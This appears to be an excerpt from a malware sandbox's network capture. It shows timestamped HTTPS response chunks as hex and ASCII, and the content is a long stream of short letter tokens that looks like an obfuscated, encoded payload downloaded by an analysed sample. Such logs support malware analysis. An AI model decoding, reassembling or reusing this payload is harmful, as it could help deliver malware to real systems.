                                                                                                                          2021-10-29 15:06:45 UTC1434INData Raw: 20 42 57 20 57 6b 20 57 6b 20 4f 7a 20 4f 7a 20 57 4f 20 6c 55 20 6c 42 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 57 6b 20 50 57 20 50 57 20 57 4f 20 7a 4f 20 50 50 73 20 50 50 6c 20 55 55 20 50 50 6b 20 57 6b 20 4f 7a 20 57 50 20 57 4f 20 50 73 50 20 4f 7a 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 57 6b 20 73 55 20 50 50 73 20 57 4f 20 7a 4f 20 50 50 73 20 50 50 6c 20 50 42 7a 20 55 6b 20 57 6b 20 4f 7a 20 4f 55 20 57 4f 20 50 6b 6c 20 6c 55 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 57 6b 20 4f 4c 20 50 73 20 57 4f 20 7a 4f 20 50 50 57 20 50 50 6c 20 7a 73 20 6c 6c 20 57 6b 20 4f 7a 20 4f 7a 20 57 4f 20 55 6b 20 50 6b 7a 20 50 50 6c 20 50 6b 55 20 50 50 4c 20 57 6b 20 73 55 20 50 50 73 20 57 4f 20 7a 4f 20 50 50 73 20 50 50 6c 20 73 6b 6c 20 4f 7a 20 57 6b 20 4f
                                                                                                                          Data Ascii: BW Wk Wk Oz Oz WO lU lB PPl PkU PPL Wk PW PW WO zO PPs PPl UU PPk Wk Oz WP WO PsP Oz PPl PkU PPL Wk sU PPs WO zO PPs PPl PBz Uk Wk Oz OU WO Pkl lU PPl PkU PPL Wk OL Ps WO zO PPW PPl zs ll Wk Oz Oz WO Uk Pkz PPl PkU PPL Wk sU PPs WO zO PPs PPl skl Oz Wk O
                                                                                                                          2021-10-29 15:06:45 UTC1438INData Raw: 20 50 4c 57 20 50 50 42 20 57 50 20 57 73 20 55 4f 20 55 20 50 42 6c 20 50 50 7a 20 50 50 42 20 50 6b 57 20 50 4f 4c 20 7a 20 73 6b 50 20 57 4f 20 42 4c 20 7a 6b 20 4c 4c 20 50 50 6b 20 50 4f 42 20 50 50 42 20 73 4c 7a 20 4f 7a 20 6c 42 20 73 20 7a 57 20 50 50 4f 20 50 6b 6b 20 50 6b 57 20 50 73 7a 20 73 50 20 4f 6b 20 57 57 20 73 4c 20 7a 6b 20 73 50 6c 20 7a 42 20 50 6b 7a 20 50 50 73 20 50 55 20 57 73 20 4c 4c 20 50 50 7a 20 7a 57 20 50 50 4f 20 50 50 42 20 50 6b 7a 20 50 7a 6b 20 50 6c 20 4f 55 20 57 6b 20 4f 6c 20 7a 57 20 50 73 20 42 57 20 73 57 20 50 50 73 20 73 6c 20 57 73 20 6c 42 20 73 20 73 73 20 50 50 55 20 55 73 20 50 6b 57 20 50 4c 73 20 4f 6c 20 50 73 50 20 57 57 20 4c 50 20 7a 6b 20 50 50 55 20 57 4c 20 50 6b 7a 20 50 50 73 20 73 6c 20 57
                                                                                                                          Data Ascii: PLW PPB WP Ws UO U PBl PPz PPB PkW POL z skP WO BL zk LL PPk POB PPB sLz Oz lB s zW PPO Pkk PkW Psz sP Ok WW sL zk sPl zB Pkz PPs PU Ws LL PPz zW PPO PPB Pkz Pzk Pl OU Wk Ol zW Ps BW sW PPs sl Ws lB s ss PPU Us PkW PLs Ol PsP WW LP zk PPU WL Pkz PPs sl W
                                                                                                                          2021-10-29 15:06:45 UTC1442INData Raw: 50 50 7a 20 73 50 73 20 50 73 6c 20 42 6b 20 50 50 50 20 42 73 20 50 50 4f 20 50 6c 42 20 42 4c 20 50 6b 4c 20 7a 50 20 73 6b 7a 20 50 6b 42 20 73 4c 4f 20 50 73 57 20 55 50 20 57 4c 20 6c 42 20 73 20 7a 57 20 50 50 4f 20 73 7a 20 50 6b 4f 20 55 4f 20 73 4f 20 57 4c 20 57 6b 20 55 57 20 7a 50 20 55 7a 20 55 57 20 50 6b 4f 20 50 50 73 20 55 50 20 57 4c 20 73 42 20 4f 57 20 7a 50 20 50 50 4f 20 73 7a 20 50 6b 4f 20 73 4c 6c 20 50 4c 20 57 4c 20 57 6b 20 55 57 20 7a 50 20 50 42 55 20 55 73 20 50 6b 4f 20 50 50 73 20 55 55 20 57 4c 20 73 50 55 20 73 20 73 50 7a 20 50 73 6c 20 4f 20 50 6b 4f 20 50 4f 20 42 20 4f 55 20 57 6b 20 6c 50 20 7a 50 20 55 6c 20 50 6b 42 20 73 4f 7a 20 50 73 57 20 50 6c 55 20 57 4c 20 6c 42 20 73 20 7a 57 20 50 50 4f 20 73 4f 4f 20 50
                                                                                                                          Data Ascii: PPz sPs Psl Bk PPP Bs PPO PlB BL PkL zP skz PkB sLO PsW UP WL lB s zW PPO sz PkO UO sO WL Wk UW zP Uz UW PkO PPs UP WL sB OW zP PPO sz PkO sLl PL WL Wk UW zP PBU Us PkO PPs UU WL sPU s sPz Psl O PkO PO B OU Wk lP zP Ul PkB sOz PsW PlU WL lB s zW PPO sOO P
                                                                                                                          2021-10-29 15:06:45 UTC1445INData Raw: 20 50 6b 42 20 50 50 57 20 57 4c 20 50 50 4c 20 57 4f 20 50 42 73 20 50 73 57 20 57 4f 20 50 6b 4f 20 73 50 50 20 57 6b 20 50 50 73 20 4f 42 20 50 73 6c 20 7a 50 20 50 55 4c 20 50 50 6c 20 50 55 20 50 6b 42 20 7a 4c 20 57 4c 20 50 50 4c 20 57 4f 20 50 42 73 20 50 73 57 20 73 7a 20 50 6b 4f 20 50 55 57 20 57 6b 20 50 55 6b 20 4f 6b 20 50 7a 4c 20 7a 50 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 50 6c 6c 20 57 4c 20 50 4f 57 20 57 4f 20 42 6b 20 50 50 6b 20 73 57 73 20 50 6b 4f 20 50 55 57 20 57 6b 20 50 6c 4f 20 4f 6b 20 50 57 50 20 7a 50 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 50 4f 57 20 57 4c 20 50 4c 6c 20 57 4f 20 50 55 42 20 50 50 6b 20 73 73 6b 20 50 6b 4f 20 50 55 57 20 57 6b 20 50 57 7a 20 4f 6b 20 73 4f 6c 20 7a 50 20 4f 55 20 50 50
                                                                                                                          Data Ascii: PkB PPW WL PPL WO PBs PsW WO PkO sPP Wk PPs OB Psl zP PUL PPl PU PkB zL WL PPL WO PBs PsW sz PkO PUW Wk PUk Ok PzL zP OU PPl PWW Psl Pll WL POW WO Bk PPk sWs PkO PUW Wk PlO Ok PWP zP OU PPl PWW Psl POW WL PLl WO PUB PPk ssk PkO PUW Wk PWz Ok sOl zP OU PP
                                                                                                                          2021-10-29 15:06:45 UTC1450INData Raw: 6b 20 4f 50 20 57 6c 20 57 4f 20 50 42 73 20 50 73 57 20 50 4f 55 20 50 50 4c 20 57 50 20 57 6b 20 50 55 7a 20 42 50 20 50 57 6b 20 6c 4c 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 73 4f 73 20 4f 57 20 50 50 4c 20 57 4f 20 50 42 73 20 50 73 57 20 50 4f 55 20 50 50 73 20 57 50 20 57 6b 20 50 55 7a 20 42 50 20 57 4f 20 6c 4f 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 50 7a 20 4f 42 20 50 50 4c 20 57 4f 20 50 42 73 20 50 73 57 20 57 4c 20 50 50 57 20 57 50 20 57 6b 20 50 55 7a 20 42 50 20 7a 42 20 6c 4f 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 50 6c 7a 20 4f 42 20 50 50 4c 20 57 4f 20 50 42 73 20 50 73 57 20 50 7a 50 20 50 50 57 20 57 50 20 57 6b 20 50 55 7a 20 42 50 20 73 50 4f 20 6c 4f 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 7a 73
                                                                                                                          Data Ascii: k OP Wl WO PBs PsW POU PPL WP Wk PUz BP PWk lL OU PPl PWW Psl sOs OW PPL WO PBs PsW POU PPs WP Wk PUz BP WO lO OU PPl PWW Psl Pz OB PPL WO PBs PsW WL PPW WP Wk PUz BP zB lO OU PPl PWW Psl Plz OB PPL WO PBs PsW PzP PPW WP Wk PUz BP sPO lO OU PPl PWW Psl zs
                                                                                                                          2021-10-29 15:06:45 UTC1454INData Raw: 42 50 20 73 4f 42 20 50 6b 7a 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 73 50 6b 20 7a 20 50 50 4c 20 57 4f 20 50 42 73 20 50 73 57 20 50 50 6c 20 7a 4f 20 57 50 20 57 6b 20 50 55 7a 20 42 50 20 73 73 20 50 6b 55 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 50 50 4f 20 55 20 50 50 4c 20 57 4f 20 50 42 73 20 50 73 57 20 73 50 20 7a 4f 20 57 50 20 57 6b 20 50 55 7a 20 42 50 20 50 7a 73 20 50 6b 55 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 50 4f 42 20 55 20 50 50 4c 20 57 4f 20 50 42 73 20 50 73 57 20 50 7a 50 20 7a 4f 20 57 50 20 57 6b 20 50 55 7a 20 42 50 20 73 50 4f 20 50 6b 55 20 4f 55 20 50 50 6c 20 50 57 57 20 50 73 6c 20 50 7a 20 50 6b 20 50 50 4c 20 57 4f 20 50 42 73 20 50 73 57 20 57 4c 20 7a 6c 20 57 50 20 57 6b 20 50 55 7a 20 42 50
                                                                                                                          Data Ascii: BP sOB Pkz OU PPl PWW Psl sPk z PPL WO PBs PsW PPl zO WP Wk PUz BP ss PkU OU PPl PWW Psl PPO U PPL WO PBs PsW sP zO WP Wk PUz BP Pzs PkU OU PPl PWW Psl POB U PPL WO PBs PsW PzP zO WP Wk PUz BP sPO PkU OU PPl PWW Psl Pz Pk PPL WO PBs PsW WL zl WP Wk PUz BP
                                                                                                                          2021-10-29 15:06:45 UTC1458INData Raw: 50 6b 55 20 50 50 73 20 50 6b 6c 20 4c 4c 20 50 6c 20 4f 6c 20 7a 4f 20 50 50 4f 20 50 42 6b 20 50 73 4f 20 7a 4c 20 4f 4c 20 4f 7a 20 57 6b 20 73 55 20 7a 4f 20 7a 50 20 50 6b 7a 20 50 6b 55 20 50 50 73 20 73 50 20 57 50 20 50 6c 20 4f 6c 20 7a 4f 20 50 50 4f 20 50 42 6b 20 50 6b 57 20 73 50 73 20 4f 4c 20 4f 7a 20 57 6b 20 50 57 20 7a 4c 20 7a 50 20 50 6b 7a 20 50 6b 55 20 50 50 73 20 6b 20 57 6c 20 50 6c 20 4f 6c 20 7a 4f 20 50 50 4f 20 50 4f 42 20 50 6b 73 20 7a 6c 20 4f 4c 20 4f 7a 20 57 6b 20 73 4c 6b 20 50 6b 6c 20 50 55 55 20 50 6b 7a 20 50 6b 55 20 50 50 73 20 50 7a 57 20 50 50 4f 20 50 6c 20 4f 6c 20 7a 4f 20 50 50 4f 20 50 55 55 20 7a 4c 20 73 6b 4c 20 4f 4c 20 4f 7a 20 57 6b 20 73 73 6b 20 50 6b 42 20 50 6c 55 20 50 6b 7a 20 50 50 50 20 50 50
                                                                                                                          Data Ascii: PkU PPs Pkl LL Pl Ol zO PPO PBk PsO zL OL Oz Wk sU zO zP Pkz PkU PPs sP WP Pl Ol zO PPO PBk PkW sPs OL Oz Wk PW zL zP Pkz PkU PPs k Wl Pl Ol zO PPO POB Pks zl OL Oz Wk sLk Pkl PUU Pkz PkU PPs PzW PPO Pl Ol zO PPO PUU zL skL OL Oz Wk ssk PkB PlU Pkz PPP PP
                                                                                                                          2021-10-29 15:06:45 UTC1462INData Raw: 4f 57 20 57 4f 20 7a 42 20 50 50 4f 20 50 6b 6b 20 50 50 50 20 50 7a 57 20 57 6b 20 57 4f 20 57 6b 20 4c 6b 20 7a 4f 20 55 6c 20 50 50 6c 20 57 55 20 50 50 73 20 4f 6b 20 57 73 20 4c 6c 20 57 4f 20 73 20 50 50 4f 20 50 6b 57 20 50 6b 57 20 50 6b 57 20 57 6b 20 50 6b 73 20 57 6b 20 4f 6b 20 7a 6b 20 50 6b 57 20 50 50 6c 20 57 55 20 50 50 73 20 50 7a 20 57 73 20 4f 6c 20 57 4f 20 73 20 50 50 4f 20 7a 6c 20 50 6b 57 20 50 50 50 20 57 6b 20 50 6b 73 20 57 6b 20 50 7a 20 7a 6b 20 7a 4c 20 50 50 6c 20 57 55 20 50 50 73 20 73 6b 20 57 73 20 50 6c 20 57 4f 20 50 57 50 20 7a 55 20 50 7a 4f 20 6c 6b 20 50 50 50 20 57 6b 20 6b 20 57 6b 20 7a 4c 20 7a 4f 20 4c 50 20 50 50 6c 20 73 4f 4f 20 50 50 73 20 50 4f 42 20 4f 7a 20 50 57 6c 20 57 4f 20 73 4c 4f 20 50 50 4f 20
                                                                                                                          Data Ascii: OW WO zB PPO Pkk PPP PzW Wk WO Wk Lk zO Ul PPl WU PPs Ok Ws Ll WO s PPO PkW PkW PkW Wk Pks Wk Ok zk PkW PPl WU PPs Pz Ws Ol WO s PPO zl PkW PPP Wk Pks Wk Pz zk zL PPl WU PPs sk Ws Pl WO PWP zU PzO lk PPP Wk k Wk zL zO LP PPl sOO PPs POB Oz PWl WO sLO PPO
                                                                                                                          2021-10-29 15:06:45 UTC1466INData Raw: 20 50 50 55 20 57 4f 20 42 73 20 50 50 4f 20 4f 7a 20 50 6b 55 20 73 6c 20 57 6b 20 50 50 6c 20 57 6b 20 55 6b 20 7a 4f 20 57 57 20 50 50 6c 20 6b 20 50 50 73 20 50 50 55 20 4f 7a 20 55 73 20 57 4f 20 50 6c 20 50 50 4f 20 73 42 20 50 6b 55 20 57 4c 20 57 6b 20 42 4f 20 57 6b 20 50 50 57 20 7a 4f 20 4c 20 50 50 6c 20 4f 6b 20 50 50 73 20 42 4f 20 4f 7a 20 50 50 55 20 57 4f 20 4c 55 20 50 50 4f 20 4f 7a 20 50 6b 55 20 4f 20 57 6b 20 50 50 6c 20 57 6b 20 42 6c 20 7a 4f 20 57 57 20 50 50 6c 20 73 6c 20 50 50 73 20 50 50 55 20 4f 7a 20 42 55 20 57 4f 20 50 6c 20 50 50 4f 20 50 4c 20 50 6b 55 20 57 4c 20 57 6b 20 6c 4c 20 57 6b 20 50 50 57 20 7a 4f 20 7a 20 50 50 6c 20 4f 6b 20 50 50 73 20 6c 4c 20 4f 7a 20 50 50 55 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20
                                                                                                                          Data Ascii: PPU WO Bs PPO Oz PkU sl Wk PPl Wk Uk zO WW PPl k PPs PPU Oz Us WO Pl PPO sB PkU WL Wk BO Wk PPW zO L PPl Ok PPs BO Oz PPU WO LU PPO Oz PkU O Wk PPl Wk Bl zO WW PPl sl PPs PPU Oz BU WO Pl PPO PL PkU WL Wk lL Wk PPW zO z PPl Ok PPs lL Oz PPU WO zO PPO PPl
                                                                                                                          2021-10-29 15:06:45 UTC1477INData Raw: 42 7a 20 55 50 20 50 50 73 20 50 50 55 20 55 4f 20 6c 6b 20 55 57 20 4c 73 20 50 50 20 42 7a 20 55 50 20 50 50 73 20 42 20 50 20 73 20 50 50 4f 20 55 6c 20 6c 50 20 42 7a 20 4f 6c 20 57 4f 20 50 50 20 50 50 42 20 50 50 4c 20 6c 20 50 7a 20 42 42 20 57 4f 20 4f 4c 20 42 42 20 4f 20 73 20 50 50 55 20 73 20 50 42 20 4f 7a 20 42 7a 20 55 4c 20 6c 50 20 57 20 6c 20 50 50 20 4c 20 50 42 20 6c 50 20 42 6c 20 4f 6b 20 57 4c 20 50 50 4c 20 6b 20 6b 20 6b 20 7a 4f 20 57 57 20 42 55 20 4f 42 20 57 4c 20 50 50 73 20 4c 20 50 50 55 20 73 20 55 7a 20 57 57 20 6c 6c 20 7a 7a 20 6c 50 20 50 50 57 20 6c 20 73 20 50 50 6c 20 50 7a 20 4f 7a 20 42 4f 20 55 6b 20 42 55 20 50 50 57 20 6b 20 6c 20 50 50 42 20 50 6b 6b 20 42 6c 20 57 73 20 55 50 20 42 7a 20 50 6b 20 6b 20 4f 20
                                                                                                                          Data Ascii: Bz UP PPs PPU UO lk UW Ls PP Bz UP PPs B P s PPO Ul lP Bz Ol WO PP PPB PPL l Pz BB WO OL BB O s PPU s PB Oz Bz UL lP W l PP L PB lP Bl Ok WL PPL k k k zO WW BU OB WL PPs L PPU s Uz WW ll zz lP PPW l s PPl Pz Oz BO Uk BU PPW k l PPB Pkk Bl Ws UP Bz Pk k O
                                                                                                                          2021-10-29 15:06:45 UTC1482INData Raw: 20 50 6b 50 20 57 57 20 6c 6b 20 7a 57 20 4f 55 20 50 50 57 20 50 50 42 20 50 50 42 20 73 20 55 7a 20 42 57 20 57 57 20 50 6b 55 20 6c 4c 20 50 50 7a 20 55 20 50 50 57 20 50 50 73 20 50 6b 4c 20 57 50 20 4f 7a 20 55 73 20 42 57 20 50 50 57 20 57 20 50 6b 20 50 50 4f 20 55 6c 20 6c 50 20 4f 7a 20 4f 6c 20 6c 73 20 50 50 57 20 42 20 50 50 57 20 50 50 57 20 73 4c 20 6c 4f 20 57 50 20 55 4c 20 42 6c 20 50 50 42 20 6c 20 50 50 57 20 50 50 4f 20 50 6b 6b 20 42 6c 20 4f 7a 20 7a 57 20 6c 4c 20 50 50 20 4f 20 50 50 73 20 57 4f 20 55 6c 20 4f 7a 20 57 57 20 55 4f 20 6c 50 20 50 6b 20 7a 20 50 50 57 20 6c 20 50 6b 55 20 42 55 20 57 4f 20 55 57 20 6c 6b 20 50 50 73 20 7a 20 50 20 6c 20 50 6b 6b 20 42 6c 20 42 4f 20 7a 4f 20 57 4c 20 50 50 4c 20 55 20 50 50 57 20 50
                                                                                                                          Data Ascii: PkP WW lk zW OU PPW PPB PPB s Uz BW WW PkU lL PPz U PPW PPs PkL WP Oz Us BW PPW W Pk PPO Ul lP Oz Ol ls PPW B PPW PPW sL lO WP UL Bl PPB l PPW PPO Pkk Bl Oz zW lL PP O PPs WO Ul Oz WW UO lP Pk z PPW l PkU BU WO UW lk PPs z P l Pkk Bl BO zO WL PPL U PPW P
                                                                                                                          2021-10-29 15:06:45 UTC1498INData Raw: 42 20 73 73 20 57 20 50 50 73 20 50 50 6c 20 7a 57 20 6c 6b 20 50 73 4c 20 4f 7a 20 6c 50 20 42 50 20 50 73 20 4c 20 55 6b 20 4f 7a 20 50 50 4c 20 7a 55 20 57 6c 20 73 20 6b 20 73 57 20 73 50 20 50 73 73 20 7a 50 20 42 57 20 55 4f 20 7a 4f 20 42 4c 20 73 6b 20 73 57 20 73 4f 20 57 6b 20 42 4f 20 42 4f 20 7a 55 20 57 6b 20 73 6c 20 73 57 20 7a 20 4c 73 20 7a 4c 20 42 7a 20 55 6b 20 57 4f 20 50 55 20 73 4c 20 50 20 4f 4c 20 4c 50 20 55 4f 20 7a 4f 20 7a 6c 20 42 7a 20 4f 20 50 55 20 50 20 57 20 50 50 73 20 42 4f 20 55 57 20 55 4c 20 42 42 20 4f 20 50 55 20 50 20 57 20 50 50 73 20 42 42 20 7a 50 20 6c 6b 20 55 4f 20 7a 4f 20 73 50 20 50 42 20 73 57 20 4f 6c 20 50 6b 50 20 7a 55 20 7a 42 20 42 42 20 42 6b 20 50 50 4f 20 50 7a 20 7a 20 4f 20 50 6b 55 20 50 73
                                                                                                                          Data Ascii: B ss W PPs PPl zW lk PsL Oz lP BP Ps L Uk Oz PPL zU Wl s k sW sP Pss zP BW UO zO BL sk sW sO Wk BO BO zU Wk sl sW z Ls zL Bz Uk WO PU sL P OL LP UO zO zl Bz O PU P W PPs BO UW UL BB O PU P W PPs BB zP lk UO zO sP PB sW Ol PkP zU zB BB Bk PPO Pz z O PkU Ps
                                                                                                                          2021-10-29 15:06:45 UTC1509INData Raw: 50 20 6c 6b 20 7a 57 20 42 57 20 57 4f 20 50 7a 20 6b 20 73 42 20 6b 20 42 50 20 55 50 20 55 4f 20 6c 50 20 42 42 20 4f 55 20 50 20 50 50 6c 20 57 6b 20 73 73 20 55 50 20 55 73 20 7a 6c 20 50 50 42 20 4f 57 20 42 20 50 42 20 4c 6b 20 50 50 73 20 50 6b 50 20 42 42 20 55 50 20 42 42 20 4f 55 20 57 50 20 73 57 20 50 20 57 6b 20 6c 57 20 42 7a 20 7a 6c 20 42 55 20 7a 4f 20 4f 55 20 73 42 20 4c 20 42 20 7a 6c 20 42 42 20 6c 6b 20 55 7a 20 57 55 20 4f 7a 20 50 73 20 73 57 20 73 50 20 42 57 20 4f 7a 20 50 50 6c 20 7a 4c 20 4c 73 20 4f 7a 20 50 73 20 73 57 20 73 50 20 42 57 20 4f 7a 20 7a 6b 20 6c 55 20 4c 73 20 73 4c 20 42 20 50 6b 55 20 57 57 20 7a 6c 20 42 7a 20 50 73 42 20 7a 55 20 57 50 20 73 6c 20 73 73 20 50 73 20 73 7a 20 50 50 7a 20 42 42 20 55 50 20 42
                                                                                                                          Data Ascii: P lk zW BW WO Pz k sB k BP UP UO lP BB OU P PPl Wk ss UP Us zl PPB OW B PB Lk PPs PkP BB UP BB OU WP sW P Wk lW Bz zl BU zO OU sB L B zl BB lk Uz WU Oz Ps sW sP BW Oz PPl zL Ls Oz Ps sW sP BW Oz zk lU Ls sL B PkU WW zl Bz PsB zU WP sl ss Ps sz PPz BB UP B
                                                                                                                          2021-10-29 15:06:45 UTC1525INData Raw: 20 50 50 57 20 7a 4f 20 73 50 20 50 50 6c 20 4f 4f 20 50 50 73 20 50 50 7a 20 4f 7a 20 50 6b 20 57 4f 20 57 6c 20 50 50 4f 20 42 4c 20 50 6b 55 20 57 4f 20 57 6b 20 6b 20 57 6b 20 50 73 6c 20 7a 4f 20 57 4f 20 50 50 6c 20 73 6b 20 50 50 73 20 55 55 20 4f 7a 20 50 50 4c 20 57 4f 20 4f 20 50 50 4f 20 73 55 20 50 6b 55 20 73 4c 20 57 6b 20 55 50 20 57 6b 20 50 50 73 20 7a 4f 20 73 50 20 50 50 6c 20 4c 6b 20 50 50 73 20 6c 4f 20 4f 7a 20 50 50 57 20 57 4f 20 57 50 20 50 50 4f 20 73 20 50 6b 55 20 6c 4c 20 57 6b 20 50 73 42 20 57 6b 20 7a 50 20 7a 4f 20 73 20 50 50 6c 20 50 50 20 50 50 73 20 50 50 4c 20 4f 7a 20 6c 57 20 57 4f 20 42 20 50 50 4f 20 4c 42 20 50 6b 55 20 4c 57 20 57 6b 20 50 50 4c 20 57 6b 20 50 50 20 7a 4f 20 6c 55 20 50 50 6c 20 50 6b 55 20 7a
                                                                                                                          Data Ascii: PPW zO sP PPl OO PPs PPz Oz Pk WO Wl PPO BL PkU WO Wk k Wk Psl zO WO PPl sk PPs UU Oz PPL WO O PPO sU PkU sL Wk UP Wk PPs zO sP PPl Lk PPs lO Oz PPW WO WP PPO s PkU lL Wk PsB Wk zP zO s PPl PP PPs PPL Oz lW WO B PPO LB PkU LW Wk PPL Wk PP zO lU PPl PkU z
                                                                                                                          2021-10-29 15:06:45 UTC1541INData Raw: 73 20 50 7a 73 20 50 6c 73 20 55 42 20 73 4f 57 20 50 4f 55 20 55 7a 20 50 6c 7a 20 73 6b 6b 20 4c 73 20 50 7a 73 20 50 6c 73 20 50 50 6c 20 55 42 20 50 73 4f 20 6c 4c 20 57 50 20 4c 4f 20 50 6c 7a 20 73 6b 42 20 42 7a 20 55 7a 20 50 50 42 20 50 6b 7a 20 50 6b 50 20 4c 73 20 73 55 20 57 50 20 4f 6b 20 7a 4f 20 50 6b 4c 20 50 6b 4c 20 73 4c 6c 20 73 50 4c 20 57 50 20 4f 42 20 57 6b 20 42 4c 20 7a 4c 20 50 50 57 20 55 42 20 50 73 6c 20 55 4c 20 57 50 20 4c 4f 20 50 6c 55 20 57 4f 20 55 4c 20 50 50 6c 20 50 50 42 20 50 73 6b 20 55 7a 20 4c 50 20 4f 55 20 4c 73 20 50 7a 73 20 50 57 42 20 50 73 50 20 50 50 4f 20 50 50 50 20 55 7a 20 50 6b 73 20 4c 6c 20 4c 73 20 73 6c 20 7a 57 20 55 42 20 73 4f 4f 20 50 6b 55 20 50 50 6c 20 57 42 20 4f 55 20 4c 73 20 50 7a 4c
                                                                                                                          Data Ascii: s Pzs Pls UB sOW POU Uz Plz skk Ls Pzs Pls PPl UB PsO lL WP LO Plz skB Bz Uz PPB Pkz PkP Ls sU WP Ok zO PkL PkL sLl sPL WP OB Wk BL zL PPW UB Psl UL WP LO PlU WO UL PPl PPB Psk Uz LP OU Ls Pzs PWB PsP PPO PPP Uz Pks Ll Ls sl zW UB sOO PkU PPl WB OU Ls PzL
                                                                                                                          2021-10-29 15:06:45 UTC1557INData Raw: 50 6c 7a 20 73 50 50 20 7a 6c 20 55 6b 20 50 50 6c 20 55 55 20 50 50 57 20 73 42 20 4f 7a 20 4f 7a 20 42 6b 20 50 73 4f 20 50 50 4f 20 55 42 20 50 73 6c 20 73 4f 6b 20 50 57 50 20 4f 55 20 4c 73 20 50 7a 73 20 73 57 73 20 50 73 4c 20 55 4c 20 50 6b 55 20 50 6b 50 20 4c 73 20 50 20 57 50 20 4c 42 20 73 50 73 20 50 42 42 20 50 73 4f 20 42 55 20 50 50 73 20 4c 55 20 4c 4f 20 4c 20 57 57 20 6c 6b 20 73 4f 73 20 50 6c 6c 20 50 6b 6b 20 7a 7a 20 57 6b 20 4c 6c 20 4c 73 20 6c 20 7a 57 20 55 42 20 73 4f 57 20 50 7a 55 20 50 73 50 20 73 42 20 4f 7a 20 4c 55 20 4c 42 20 50 6b 50 20 50 50 57 20 50 6b 4c 20 73 4c 6c 20 50 7a 7a 20 4f 55 20 73 4f 20 57 6b 20 42 6b 20 55 4c 20 55 6b 20 50 50 6c 20 50 73 6b 20 55 7a 20 4c 50 20 4f 55 20 4c 73 20 50 7a 73 20 73 73 7a 20
                                                                                                                          Data Ascii: Plz sPP zl Uk PPl UU PPW sB Oz Oz Bk PsO PPO UB Psl sOk PWP OU Ls Pzs sWs PsL UL PkU PkP Ls P WP LB sPs PBB PsO BU PPs LU LO L WW lk sOs Pll Pkk zz Wk Ll Ls l zW UB sOW PzU PsP sB Oz LU LB PkP PPW PkL sLl Pzz OU sO Wk Bk UL Uk PPl Psk Uz LP OU Ls Pzs ssz
                                                                                                                          2021-10-29 15:06:46 UTC1573INData Raw: 55 20 73 7a 20 57 6b 20 42 55 20 57 6b 20 50 50 50 20 7a 4f 20 4c 50 20 50 50 6c 20 4f 4c 20 50 50 73 20 6c 73 20 4f 7a 20 50 6b 4f 20 57 4f 20 57 20 50 50 4f 20 57 20 50 6b 55 20 73 55 20 57 6b 20 7a 50 20 57 6b 20 50 50 4c 20 7a 4f 20 57 42 20 50 50 6c 20 73 6c 20 50 50 73 20 7a 4c 20 4f 7a 20 50 50 6c 20 57 4f 20 57 42 20 50 50 4f 20 50 20 50 6b 55 20 4f 50 20 57 6b 20 50 6b 4c 20 57 6b 20 55 42 20 7a 4f 20 50 20 50 50 6c 20 57 73 20 50 50 73 20 55 57 20 4f 7a 20 50 50 20 57 4f 20 57 55 20 50 50 4f 20 73 73 20 50 6b 55 20 57 57 20 57 6b 20 42 4f 20 57 6b 20 55 57 20 7a 4f 20 4f 4c 20 50 50 6c 20 6b 20 50 50 73 20 6c 4f 20 4f 7a 20 7a 55 20 57 4f 20 50 4c 20 50 50 4f 20 6c 50 20 50 6b 55 20 42 55 20 57 6b 20 55 4f 20 57 6b 20 50 50 50 20 7a 4f 20 42 4f
                                                                                                                          Data Ascii: U sz Wk BU Wk PPP zO LP PPl OL PPs ls Oz PkO WO W PPO W PkU sU Wk zP Wk PPL zO WB PPl sl PPs zL Oz PPl WO WB PPO P PkU OP Wk PkL Wk UB zO P PPl Ws PPs UW Oz PP WO WU PPO ss PkU WW Wk BO Wk UW zO OL PPl k PPs lO Oz zU WO PL PPO lP PkU BU Wk UO Wk PPP zO BO
                                                                                                                          2021-10-29 15:06:46 UTC1589INData Raw: 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50 50 6c 20 50 6b 55 20 50 50 73 20 57 6b 20 4f 7a 20 57 6b 20 57 4f 20 7a 4f 20 50 50 4f 20 50
                                                                                                                          Data Ascii: O PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO PPl PkU PPs Wk Oz Wk WO zO PPO P
